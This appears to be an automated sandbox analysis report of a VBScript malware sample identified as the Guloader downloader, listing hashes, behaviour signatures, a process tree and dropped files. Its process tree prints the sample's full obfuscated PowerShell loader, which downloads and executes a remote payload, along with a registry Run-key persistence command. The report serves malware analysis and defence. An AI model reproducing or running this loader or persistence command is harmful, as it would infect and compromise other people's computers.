Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-07-2024 18:54

General

  • Target
    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs
  • Size
    102KB
  • MD5
    01c94fd161a6999247d5f39f63bdeecf
  • SHA1
    f5da84dd0df3da70aa7cc5167d3a870aec691bd8
  • SHA256
    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79
  • SHA512
    ac62e8e35dff33dec16b4cb9faed77dbbe8e5b51d1576495d12aed0eb0ab81f92ae6af6087441e812a7ce9a102898ed4e5622e68b87c5d6b7b8d9999dd599a1d
  • SSDEEP
    3072:c4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvfCS5x:pt7SPReHd0WoT28faa+CS64mu8IQCtv/

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
        3⤵
          PID:2808
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
            4⤵
              PID:2384
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1240
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2620
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1976

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 342B
    MD5: 6abcb26f8bccc06ba812dbffc5933a96
    SHA1: 4305c908a01dd8059406a15e6b1daaeb7e20db61
    SHA256: 1da0c861ce504db27e0e764d019af6adf23d5987a9498ffc6446365030793a77
    SHA512: 30448bb88214cd2059ec7718ad9245d3eb0d86666ed7d2e2ff6fbe6bea582c65afe0e78c22a7aaf084b1efdc4e123eceb980ad0bf99eb7bb26aad8896e1ff2ba
  • C:\Users\Admin\AppData\Local\Temp\CabA8DF.tmp
    Filesize: 70KB
    MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
    SHA1: 1723be06719828dda65ad804298d0431f6aff976
    SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
    SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
  • C:\Users\Admin\AppData\Local\Temp\Tar6597.tmp
    Filesize: 181KB
    MD5: 4ea6026cf93ec6338144661bf1202cd1
    SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
    SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
    SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
  • C:\Users\Admin\AppData\Roaming\Coqueluche14.myx
    Filesize: 516KB
    MD5: 8e72b507dadf417f0f922a8cc04533d5
    SHA1: d2fb1f560d46af90f009069855dc1f94179c5b6a
    SHA256: 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c
    SHA512: cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CKQ750OV55N18BSWUFGX.temp
    Filesize: 7KB
    MD5: 9e3cc2afba423713dce0862a1e7665d2
    SHA1: 0bdb1a8f2eb12e130479cc48a0c47ffb6626dcd4
    SHA256: 7a2b0a49611fee20dc9456e231b724c213e46a0526bb9f8a80f7603a293cd6e3
    SHA512: baa44caf9146d6a84b1ba6a688a3f71c210eac4d6fdc3c84395f2c3211b8375e28520293f000595e4d7e2de2b974f02821a41e06fa3ec5490e1438dd58e47f2d
  • memory/1240-56-0x0000000001BE0000-0x0000000002B90000-memory.dmp
    Filesize: 15.7MB
  • memory/1240-54-0x0000000000B70000-0x0000000001BD2000-memory.dmp
    Filesize: 16.4MB
  • memory/2692-35-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/2692-27-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/2692-26-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/2692-23-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/2692-33-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/2692-22-0x0000000002390000-0x0000000002398000-memory.dmp
    Filesize: 32KB
  • memory/2692-34-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
    Filesize: 4KB
  • memory/2692-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
    Filesize: 2.9MB
  • memory/2692-20-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
    Filesize: 4KB
  • memory/2692-24-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/2692-25-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/2692-59-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
    Filesize: 9.6MB
  • memory/3068-36-0x00000000065F0000-0x00000000075A0000-memory.dmp
    Filesize: 15.7MB